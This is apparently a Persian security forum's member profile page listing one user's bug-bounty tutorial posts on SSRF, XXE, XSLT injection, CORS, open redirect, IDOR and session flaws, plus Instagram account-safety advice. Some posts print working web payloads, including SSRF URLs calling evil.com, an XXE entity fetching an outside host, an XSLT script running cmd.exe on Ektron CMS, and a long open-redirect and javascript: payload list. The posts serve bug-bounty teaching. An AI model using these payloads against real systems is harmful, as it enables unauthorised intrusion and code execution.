با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
21 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1
آخرین بار برد 1314CK.0FF3NSIV3 در اردیبهشت 18 2022
1314CK.0FF3NSIV3 یکی از رکورد داران بیشترین تعداد پسند مطالب است !
اعتبار در سایت
2 Neutralدرباره 1314CK.0FF3NSIV3
- تاریخ تولد 01/10/1980
Converted
-
Name
Nothing
-
Main os
Ubuntu
-
Programming language
خیر
آخرین بازدید کنندگان نمایه
بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.
-
Mr.Falcon شروع به دنبال کردن 1314CK.0FF3NSIV3 کرد
-
1314CK.0FF3NSIV3 شروع به دنبال کردن آسیب پذیری Ssrf در باگ بانتی (bug Bounty)، بررسی Account Takeover در باگ بانتی (bug Bounty)، آسیب پذیری Xxe در باگ بانتی (bug Bounty) و و 6 کاربر دیگر کرد
-
سلام ایا کسی تو سایت فعالیت میکنه ؟
-
بررسی Account Takeover در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام در این بررسی شما یاد خواهید گرفت که مفهوم عملکرد Account Takeover چیست و برای چی Severity آن در سایت های باگ بانتی بالاست ؛ همانطور که از اسم آن پیداست به معنی گرفتن اکانت قربانی توسط مهاجم خود این فرآیند ملزم به تمهدیداتی است که مهاجم با توجه به آسیب پذیری کشف شده در صدد آن است که سطح دسترسی خودرا بنحوی افزایش دهد که بتواند به خواسته خودش برسد از آسیب پذیری های مثل CSRF، IDOR ، بروت فورس و.... می توان نام برد . بارها دیده شده حتی با یه Business Logic Errors هم مهاجم تونسته سطح دسترسی اکانت خود را تا حد گرفتن اکانت مدیریت بالا ببره ، پس در این پست شما با سیمایی از آسیب پذری آشنا شدید در جلسات بعدی در این حیطه شما یاد خواهید گرفت که حتی در بررسی Domain هم توجهاتی داشته باشید که به Domain Takeover مشهور هست . پس باما همراه باشید /.-
- account takeover
- bug bounty
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
سلام سوالی دارم که تو عمومی نمی تونم بنا به دلایلی مطرح کنم خصوصی چطور پیام بدهم؟
-
سلام میخوام فعالیت کنم:)
-
آسیب پذیری Ssrf در باگ بانتی (bug Bounty)
1314CK.0FF3NSIV3 پاسخی برای موضوع ارسال کرد برای یک 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
یکی از تکنیک های مرسوم SSRF via URL Scheme است که بوضوح در نت هم قابل دیدن هست : Dict:// dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> ssrf.php?url=dict://attacker:11111/ Sftp:// ssrf.php?url=sftp://evil.com:11111/ Tftp:// ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET Ldap:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit ادامه دارد ... -
آسیب پذیری Xxe در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام در آسیب پذیری XXE ویا XML External Entity Injection به حمله ای اطلاق می شود که ورودی XML را در وهله اول تجزیه شود . این حمله زمانی رخ می دهد که ورودی XML حاوی وجود یک حمله خارجی توسط یک تجزیه کننده XML صورت بگیرد که بدلیل پیکربندی نامناسب داخل سرور پردازش شود. بنابراین حمله منجر به نشراطلاعات محرمانه ، حملات تکذیب سرویس ، جعل درخواست سمت سرور ، اسکن پورت و ضربات حملاتی که بعد از نیز ممکن است به همراه داشته باشد . فرض می کنیم ما یک آسیب پذیری XXE پیدا کرده ایم که محتوای زیر را در درخواست POST به برنامه ارسال می کند: <?xml version=”1.0″ encoding=”ISO-8859-1″?> <Prod> <Prod> <Type>test</type> <name>iran-cyber</name> <id>21</id> </Prod> </Prod> بررسی حمله که ببینید آسیب پذیر است یا خیر : روش 1 - شناسایی سرور آسیب پذیر با استفاده از نهاد SYSTEM: اولین قدم ببینیم آیا میتوانیم درخواستی را با ارسال یک فایل لوکال روی سرور تارگت انجام بدیم یا نه ؟! برای اینکار، با استفاده از SYSTEM استفاده می کنیم: <?xml version=”1.0″ encoding=”ISO-8859-1″?> <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM “http://YOURIP/TEST.ext” >]> <Prod> <Prod> <Type>test</type> <name>iran-cyber</name> <id>&xxe</id> </Prod> </Prod> ادامه دارد ....-
- bug-bounty
- xml external entity injection
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
باسلام باتوجه به تاپیک استارتی شما یوزر شما وارد رنک جدیدتری شد. موفق باشید /.
-
بررسی Xslt Injection در باگ بانتی
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام در بررسی گزارش XSLT ها یا به اصلاح Extensible Stylesheet Language Transformations به نوعی فرآیند برای تبدیل اسناد XML به اسناد XML دیگر استفاده می شود یا می توان گفت برای تبدیل قالب های HTML به HTML با فرآیندی دیگر برای صفحات وب. هنگامی که محتوای XSLT در دست مهاجم قرار بگیرد می تواند، حملات مختلفی با Impact مختلف انجام دهد یکی از حملاتی که منجبر با استفاده از آسیب پذیری می شود آسیب پذیری RCE است که در بررسی یک CMS خصوصی با نام Ektron Web CMS با عدم عملکرد کنترل روی داده های XSL کاربر در داخل کلاس XslCompiledTransform این باگ ایجاد شد که نهایتا منجر به RCE برای مهاجم شد . برای شروع اگر شما CMS رو دارین آدرس زیر در مرورگر اجرا کنید : http://127.0.0.1/WorkArea/ContentDesigner/ekajaxtransform.aspx قدم بعدی enumerate کردن مقادیر در XSLT هست که ریکوسئهایی که با متد POST با Burp برای تزریق XSLT استفاده می کنیم حال پارامتری که قابلیت POST شدن دارد : xslt=<?xml version="1.0" encoding="ISO-8859-1"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <html> <body> Version: <xsl:value-of select="system-property('xsl:version')" /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </body> </html> </xsl:template> </xsl:stylesheet> گام دیگر برای Ping گرفتن دست شد : xslt=<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App"> <msxsl:script implements-prefix="App" language="C#"> <![CDATA[ { System.Diagnostics.Process.Start("cmd.exe /C ping IP"); } ]]> </msxsl:script> <xsl:template match="ArrayOfTest"> </xsl:template> </xsl:stylesheet> ادامه دارد ..... بااحترام-
- bug
- bug-bounty
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
باسلام با توجه به پیشرفت روز افزون شبکه های اجتماعی ، اینستاگرام ازمحبوبیت ترین شبکه هایی در بین مردم است که بدلیل بی توجهی به مسائل امنیتی مشکلات امنیتی زیادی در این زمینه برای کاربران به همراه دارد بنابراین بحث امنیت کاربر الزامی است. بر این اساس ساختار برنامه اینستاگرام، تقریبا میشه گفت که هک شدن اکانت های آن ۹۹ درصد به خود دارنده اکانت بستگی دارد . حال به چند مورد ابتدایی که کاربر الزامی است آن را رعایت نماید اشاره می کنیم : انتخاب ایمیل برای اکانت و تنظیم پسورد مناسب فعالسازی Two-Factor Authentication برای اکانت خصوصی کردن (private) صفحه شخصی عدم استفاده از بدافزارهای تبلیغاتی و خدمات دهی اینستاگرام از سوی کاربران عدم ورود کاربران به صفحات فیشینگ از طریق مهندسی اجتماعی عدم کلیک روی لینک های ناشناس و....... افراد زیادی در اینستاگرام در زمینه های مختلفی فعالیت می کنند و بدون داشتن دانش خاصی برای تنظیم صحیح اینستاگرام در این شبکه ها فعالیت کرده و دارای مجوز و یا اعتبار رسمی نمی باشند و صرفا با یک صفحه و بیوگرافی معمول در اینستاگرام فعالیت می کنند ، بنابراین در این راستا بعضی از افراد کلاهبردار سعی به نشر عنوانین مثل امنیت اینستاگرام بصورت تضمینی یا جلوگیری از راه نفوذ این کاربران را به سمت خود هدایت میکنند که به گفته کلاهبردان از روش هایی باعث جلوگیری از هرگونه نفوذ در اینستاگرام می شوند که این نوعی فریب کاربران اینستاگرامی است که با افتادن در این دامد اطلاعات خود را برای تامین 100 درصدی اینستاگرامشون فریب کلاهبرداران را می خورند و در نهایت اکانت آن ها از دسترس خارج میشود . مشکلات امنیتی : شاید تا بحال شنیده باشید که کاربران در هنگام ورود به اکانت گفته می شود که اکانت من بالا نمیاد وکل زندگیم به بستگی پیج اینستاگرام داره نمونه ای ازاین افراد به عنوان مثال سلبریتی ها و یا استارت اپها که میگن دیگه کسب و کاری ندارم چطور اکانتم رو برگردونم ... و یا گفته میشه که فکر کنم اکانتم هک شده چون ایدیمو سرچ میزنم پست هام پاک شدن و در بیوم نوشته شده "این اکانت هک شده" این دسته مواردی هست که کاربران با آن روبرو می شوند بنابراین به راهنمایی هایی قبل از اینگونه پیشامدها و بعد از آن الزامی هست نکته مهم امنیت برای جلوگیری از مخاطرات حساس برای این عزیزان است ؛ که یاد بگیریم با چنین مشکلاتی برای خود و خانوادهمان روبرو نشیم چرا که اکثر کسانی که دچار این مشکل شده اند خودشان مقصر بوده اند. شرکت ایران سایبر در نظر دارد برای عزیزانی که در این زمینه اطلاع لازم و کافی را ندارند مشاوره داده و کاربران بتوانند در محیطی امن به فعالیت و کسب وکار خود ادامه دهند.این روش ها نیاز به دانش ابتدایی برای درک مکانیزم اینستاگرام رو ندارد فقط تنظیماتی اعمال می شود که اکانت اینستاگرام کاربران برای اینگونه مشکلات محفوظ تر بماند .سخن آخر هم تایید میکنم هیچ گونه نیازی به استخدام یک فرد برای تامین امنیت اکانت نیست و فرآیند تنظیمات صحیح شرط لازم و کافی برای شما عزیزان است.
-
آسیب پذیری Misconfigure Cors در باگ بانتی (bug Bounty)
1314CK.0FF3NSIV3 پاسخی برای موضوع ارسال کرد برای یک 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام برای تست اولیه اگر با برپ سختتون هست میتونید از دستور زیر در ویندوز با curl انجام بدین و Respnse از سمت سرور رو شبیه بالا ببینید : curl https://www.target.com -H "Origin: https://www.google.com" -I لینک دانلود curl رو از آدرس زیر دریافت کنید : https://curl.haxx.se/windows بااحترام .- 1 پاسخ
-
- 1
-
-
- access-control-allow-origin
- credentials
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
آسیب پذیری Open Redirect در باگ بانتی (bug Bounty)
1314CK.0FF3NSIV3 پاسخی برای موضوع ارسال کرد برای یک 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
لیست دیگر برای شما عزیزان فقط کافیه انتهای آدرس هایی که احساس می کنید قابل ریدارکت شدن را دارند وارد کنید . چند نمونه پارامترهای آسیب پذیر رو برای روشن شدن مطلب : /{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{payload} ?view={payload} /login?to={payload} ?image_url={payload} ?go={payload} ?return={payload} ?returnTo={payload} ?return_to={payload} ?checkout_url={payload} ?continue={payload} ?return_path={payload} حال کافیه پیلوت های زیر رو به پارامتر هایی چند نمونشو که در بالا اشاره میتونید اضافه کنید : ////[email protected]// ////[email protected]/ ///[email protected]// ///[email protected]/ //[email protected]// //[email protected]/ target;@google.com target.google.com ////[email protected]/%2e%2e ///[email protected]/%2e%2e ////[email protected]/%2e%2e%2f ///[email protected]/%2e%2e%2f //[email protected]/%2e%2e%2f ////[email protected]/%2f.. ///[email protected]/%2f.. //[email protected]/%2f.. ////[email protected]/%2f%2e%2e ///[email protected]/%2f%2e%2e //[email protected]/%2f%2e%2e http://target>.7d8T\205pZM@[email protected]/ http://target>.7d8T\205pZM@[email protected]/ ja\nva\tscript\r:alert(1) java%09script:alert(1) java%0ascript:alert(1) java%0d%0ascript%0d%0a:alert(0) java%0dscript:alert(1) Javas%26%2399;ript:alert(1) javascript://%0aalert(1) <>javascript:alert(1); //javascript:alert(1); //javascript:alert(1) /javascript:alert(1); /javascript:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) javascript:alert(1); javascript:alert(1) javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) javascript:confirm(1) javascript://https://target/?z=%0Aalert(1) javascript:prompt(1) jaVAscript://target//%0d%0aalert(1);// javascript://target?%a0alert%281%29 /https://[email protected]/ https://target;@google.com https://target.google.com https://[email protected]// https://[email protected]/ https://[email protected] /https://[email protected]/%2e%2e https:///[email protected]/%2e%2e //https://[email protected]/%2e%2e%2f https://[email protected]/%2e%2e%2f /https://[email protected]/%2f.. https://[email protected]/%2f.. /https:///[email protected]/%2f%2e%2e /https://[email protected]/%2f%2e%2e https:///[email protected]/%2f%2e%2e https://[email protected]/%2f%2e%2e http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://target@0xd83ad6ce http:target@0xd83ad6ce http://target@[::10.0.0.1] http:target@[::10.0.0.1] اگر متوجه نشدین بیشتر توضیح بدم ...- 1 پاسخ
-
- impact
- redirection
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
[اطلاعیه] جذب مدیر برای بخش های مختلف انجمن
1314CK.0FF3NSIV3 پاسخی برای موضوع ارسال کرد برای یک 1314CK.0FF3NSIV3 در قوانین سایت
باسلام طبق بررسی های اخیر کاربر های زیر وارد level دیگری از سطح رنک کاربری شده اند انجمن در حال بررسی کاربران فعال است اگر مورد دیگری مشاهده شود وارد فاز جدیدتری خواهد شد بنابراین اگر تمایل به همکاری با انجمن را دارید پس شروع کنید : Unkn0wn Reza.Black بااحترام . -
چگونگی آسیب پذیری Broken Authentication And Session Management در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام در بررسی حملات Broken Authentication و Session Management مهاجم با هدف تلاش و بازیابی رمزهای عبور ، اطلاعات حساب کاربر ، شناسه ها و سایر جزئیات اقدام می کند . از رایج ترین آسیب پذیری در استاندارد OWASP به صورت OWASP Top 10 اشاره شده است که مهاجم بدون احراز هویت و عدم توانایی سرور در تغییر نشست ها راهی برای takeover کردن انجام دهد ممکن است حتی در takeover account هم سبب شد چرا که د داده های ورود کاربر را براحتی به سرقت می رود، یا مهاجم می تواند داده های شنست ها مثل کوکی ها را جعل کند وسعی در دسترسی غیرمجاز به وب سایت ها پیدا کند . راهکارهایی که مسوب این حملات می شود : عدم اعتبارنامه احراز هویت ، هنگام ذخیره شدن رمزهای ورودی بدون هش شدن ویا رمزگذاری عدم کنترل روی اسناد و اعتبارنامه ها ،مهاجم می تواند براحتی حدس بزند یا با بازنویسی در توابع مختلف در مدیریت حساب اعم از ایجاد حساب ، تغییر رمز عبور ، بازیابی رمز عبور ، شناسه نشست ضعیفو... را انجام دهد عدم تغییرسیشن ID ها و حتی عدم تایم اوت در هنگام تغییر آن عدم کنترل روی پسورد ها ، سیشن ID ها ؛ اعتبارنامه ها که بدون رمزنگاری به سمت سرور ارسال می شوند در استاندارد Owasp میبینید : A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards میتونید در آیتم سوم عنوانش را ببینید : https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2010 برای روشن شدن حمله میتونیم به این صورت اشاره کنیم شما دو پلن a و b دارید کاربر ازپلن a لاگین شده و سیشن های اون روداره حالا با پلن b وارد اکانت شده و فقط کافیه سیشن های a روبجای b قرار بده حال چه اتفاقی میوفته ؟!!بله مهاجم میتونه به پلن a دسترسی پیدا کنه و مجددا از اون استفاده کنه این نوعی takeover کردن اکانت بکار میره که در باگ بانتی از ارزش خاصی برخورداره که این تکنیک از زیر شاخه های این حملات محسوب میشه . ادامه دارد .....-
- authentication
- management
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
عملکرد Sensitive Data Exposure در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام به آسیب پذیری اطلاق می شود که اطلاعات حساس و مهمی را برای مهاجم در دسترس قرار بدهد زمانی رخ میدهد که یک برنامه به اندازه کافی از اطلاعات حساس در هنگام نشت برای مهاجمان محافظت نشود. به عنوان مثال : اطلاعات بانکی اطلاعات شخصی نام کاربری و پسورد اکانت در دسترس قرار گرفتن session token ها رسیدن به authentication credential ها دسترسی به دیتای مهم از طریق مسیرها برای مهاجم که این موارد از طریق هایجکت شدن ، عدم ایمن بودن تارگت و sql injection و.... رخ می دهد . که در استاندارد owasp بصورت لینک زیر اشاره کرده است : https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure نحوه مقابله در Sensitive Data Exposure : استفاده از الگوریتم های رمزگذاری و رمزگذاری در هنگام جابجایی داده ها کاهش سطح دسترسی به داده های حساس غیرفعال کردن از دسترسی ذخیره سازی داده ها در فرم ها غیرفعال کردن ذخیره در فرم ها که داده ها را جمع آوری می کنند در جلسه بعدی به چند مورد اشاره می شود ...-
- data
- information disclosure
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
آسیب پذیری Idor در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
باسلام آسیب پذیری IDOR یا همون Insecure Direct Object Reference به آسیب پذیری گفته می شود که به مهاجمان اجازه می دهد تا منابعی که برای کاربران در دسترس نیستند اجازه دستری بدهد (دستیابی به داده های غیرمجاز) . برای مثال متغییرهای زیادی در وب سایت ها مانند "id" ، "pid" ، "uid"و... وجود دارد که این مقادیر معمولاً به عنوان پارامترهای HTTP دیده می شوند ، گاهی به عنوان POST data در هدر ها و کوکی ها می توان دید . مهاجم می تواند با تغییر مقادیر در هر پارامتر به هر یک از آبجکت های که به کاربران تخصیص یافته دسترسی پیدا کند مثل ویرایش یا حذف و.. که به این آسیب پذیری IDOR گفته می شود. برای فهمیدن این موضوع مهاجم در وهله اول باید نگرش توسعه دهنده ویا طراح را درک کند به عنوان مثال هنگام ورود کاربر به نسخه تحت وب ، تلفن همراه و.. از چه ماژولی ، پلاگینی و.... استفاده کرده است یا عملکردهای ورودی به چه صورت است.این فرایند با تست خودکار توسط ابزار ها بدست نمیاد بلکه از روی تجربه و عملکرد تست دستی است نوعی آزمون و خطا برای شناسایی این آسیب پذیری هاست . در استاندارد Owasp میتوانید ببینید OWASP Top 10 - 2013 (Previous Version) ) : A1-Injection - A2-Broken Authentication and Session Management - A3-Cross-Site Scripting (XSS) - A4-Insecure Direct Object References - [Merged + A7] - A5-Security Misconfiguration - A6-Sensitive Data Exposure - A7-Missing Function Level Access Control - [Merged + A4] - A8-Cross-Site Request Forgery (CSRF) [Dropped] - A9-Using Components with Known Vulnerabilities - - A10-Unvalidated Redirects and Forwards [Dropped] یا برای شفاف سازی بیشتر از مقاله زیر می تونید کمک بگیرید : https://www.owasp.org/images/4/4a/IDOR.pdf ادامه دارد ....
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.